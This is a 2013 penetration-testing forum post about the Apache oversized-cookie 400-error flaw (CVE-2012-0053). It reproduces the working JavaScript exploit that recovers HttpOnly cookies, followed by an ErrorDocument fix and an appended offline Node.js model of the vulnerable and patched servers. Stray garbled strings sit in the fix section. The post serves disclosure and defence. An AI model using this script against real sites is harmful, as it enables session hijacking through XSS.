China Network Penetration Testing Alliance

Title: Apache HttpOnly Cookie XSS Cross-Site Vulnerability

Author: admin    Time: 2013-4-19 19:15
Many programs, including some commercial and mature open-source CMS / article systems, set the HttpOnly attribute on their cookies to stop XSS from stealing the user's cookie: it forbids reading the user's cookie directly from JS and so lowers the impact of an XSS. The issue described here can be used precisely to bypass that HttpOnly attribute on the cookie.
Open a site in Chrome, press F12 to open the developer tools, go to the Console, enter the following code and press Enter:

// http://www.exploit-db.com/exploits/18442/
function setCookies (good) {
    // Construct string for cookie value: 819 bytes per cookie, ten cookies,
    // so the Cookie request header exceeds Apache's 8190-byte default
    // LimitRequestFieldSize and the server answers 400
    var str = "";
    for (var i = 0; i < 819; i++) {
        str += "x";
    }
    // Set cookies
    for (i = 0; i < 10; i++) {
        // Expire evil cookie
        if (good) {
            var cookie = "xss" + i + "=;expires=" + new Date(+new Date() - 1).toUTCString() + "; path=/;";
        }
        // Set evil cookie
        else {
            var cookie = "xss" + i + "=" + str + ";path=/";
        }
        document.cookie = cookie;
    }
}

function makeRequest() {
    setCookies();
    function parseCookies () {
        var cookie_dict = {};
        // Only react on 400 status
        if (xhr.readyState === 4 && xhr.status === 400) {
            // Replace newlines and match <pre> content (the echoed request header line)
            var content = xhr.responseText.replace(/\r|\n/g, '').match(/<pre>(.+)<\/pre>/);
            if (content && content.length) {
                // Remove Cookie: prefix
                content = content[1].replace("Cookie: ", "");
                // Drop the padding cookies, keep everything else (including HttpOnly ones)
                var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
                // Add cookies to object; split on the first "=" only so values
                // containing "=" (e.g. base64) are not truncated
                for (var i = 0; i < cookies.length; i++) {
                    var eq = cookies[i].indexOf('=');
                    if (eq === -1) continue;
                    cookie_dict[cookies[i].slice(0, eq).trim()] = cookies[i].slice(eq + 1);
                }
            }
            // Unset malicious cookies
            setCookies(true);
            alert(JSON.stringify(cookie_dict));
        }
    }
    // Make XHR request
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = parseCookies;
    xhr.open("GET", "/", true);
    xhr.send(null);
}
makeRequest();

You will then see a glorious 400 error containing the cookie information.

Download: https://gist.github.com/pilate/1955a1c28324d4724b7b/download

Fix:
3 {/ _- W& g  V5 \
Apache officially provides four ways of handling errors (http://httpd.apache.org/docs/2.0/mod/core.html#errordocument), as follows:

In the event of a problem or error, Apache can be configured to do one of four things:

1. output a simple hardcoded error message
2. output a customized message
3. redirect to a local URL-path to handle the problem/error
4. redirect to an external URL to handle the problem/error
6 k5 W) Q' i6 O& `7 X2 b6 y8 s* H) `: r
In my testing, for 400 errors only method 2 is effective: the response no longer contains the cookie content.
7 i5 ~# a  h7 d
Apache configuration:

ErrorDocument 400 "security test"
' C+ S/ @# H2 D. n3 m
Of course, upgrading Apache to the latest version also works :).
Reference: http://httpd.apache.org/security/vulnerabilities_22.html
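As an added example (not part of the original post and not the exploit-db code), the following Node.js script models both sides of the technique offline: a server that behaves like an unpatched Apache 2.2 and echoes an oversized request header line inside <pre> in its 400 page, the same server with the `ErrorDocument 400 "security test"` fix (equivalently, the patched behaviour shipped in 2.2.22 for CVE-2012-0053), and the client-side parser that recovers the HttpOnly cookies from the echo. The 8190-byte limit (Apache's default LimitRequestFieldSize), the two sample session cookies and the HTML layout of the 400 page are assumptions constructed for the demonstration, not captured from a real server. Run it with `node` and it prints what leaks from each server model.

```javascript
// Added example, not from the original post or exploit-db entry 18442: an
// offline model of the oversized-cookie HttpOnly bypass and of the
// ErrorDocument fix. No real server is contacted.

// Apache's default LimitRequestFieldSize (assumed here, matching the 2.2 default).
const LIMIT_REQUEST_FIELD_SIZE = 8190;

// Constructed session cookies the browser already holds. In a real browser
// these carry the HttpOnly flag and are invisible to document.cookie.
const HTTPONLY_COOKIES = { PHPSESSID: 'a1b2c3d4e5f6', auth_token: 'tok_9f8e7d6c' };

// Mirror of setCookies() in the post: `count` padding cookies of `size` x's
// each, so that the Cookie header alone exceeds the header size limit.
function paddingCookies(count, size) {
  const pairs = {};
  for (let i = 0; i < count; i++) pairs['xss' + i] = 'x'.repeat(size);
  return pairs;
}

// Serialise cookies the way a browser does for the Cookie request header.
function cookieHeader(cookies) {
  return Object.keys(cookies).map(k => k + '=' + cookies[k]).join('; ');
}

// Model of the vulnerable 2.2.x behaviour: when a header line is too long the
// server answers 400 and echoes the offending line inside <pre>...</pre>.
// (Assumed layout, modelled on the page the post describes.)
function vulnerableResponse(headerName, headerValue) {
  const line = headerName + ': ' + headerValue;
  if (line.length <= LIMIT_REQUEST_FIELD_SIZE) return { status: 200, body: '<html>ok</html>' };
  return {
    status: 400,
    body: '<html><head><title>400 Bad Request</title></head><body>' +
          '<h1>Bad Request</h1><p>Your browser sent a request that this server ' +
          'could not understand.<br />\nSize of a request header field exceeds ' +
          'server limit.<br />\n<pre>\n' + line + '\n</pre>\n</p></body></html>'
  };
}

// Model of the same server with `ErrorDocument 400 "security test"` (or the
// patched mod_core): the body is a fixed string and never contains the header.
function hardenedResponse(headerName, headerValue) {
  const line = headerName + ': ' + headerValue;
  if (line.length <= LIMIT_REQUEST_FIELD_SIZE) return { status: 200, body: '<html>ok</html>' };
  return { status: 400, body: 'security test' };
}

// The client side of the post's exploit: pull the echoed Cookie line out of
// the 400 body, drop the padding cookies, and return the rest as an object.
// Returns an empty object if nothing is echoed, i.e. the bypass failed.
function extractCookies(response) {
  const dict = {};
  if (response.status !== 400) return dict;
  const m = response.body.replace(/\r|\n/g, '').match(/<pre>(.+)<\/pre>/);
  if (!m) return dict;
  const cookies = m[1].replace(/^Cookie: /, '').replace(/xss\d+=x+;?\s*/g, '').split(';');
  for (const c of cookies) {
    const eq = c.indexOf('=');          // split on the first "=" only
    if (eq === -1) continue;
    dict[c.slice(0, eq).trim()] = c.slice(eq + 1);
  }
  return dict;
}

// Run the attack against both server models and report what leaked.
function demo() {
  const all = Object.assign({}, HTTPONLY_COOKIES, paddingCookies(10, 819));
  const header = cookieHeader(all);
  return {
    headerLength: header.length,
    leakedFromVulnerable: extractCookies(vulnerableResponse('Cookie', header)),
    leakedFromHardened: extractCookies(hardenedResponse('Cookie', header)),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

The point the model makes explicit: HttpOnly protects `document.cookie`, not the Cookie request header, so any server component that reflects raw request headers into a response body readable by script defeats it. The hardened branch stops the leak simply because the 400 body no longer contains the header; the padding cookies are still accepted and still trigger the 400.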

Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2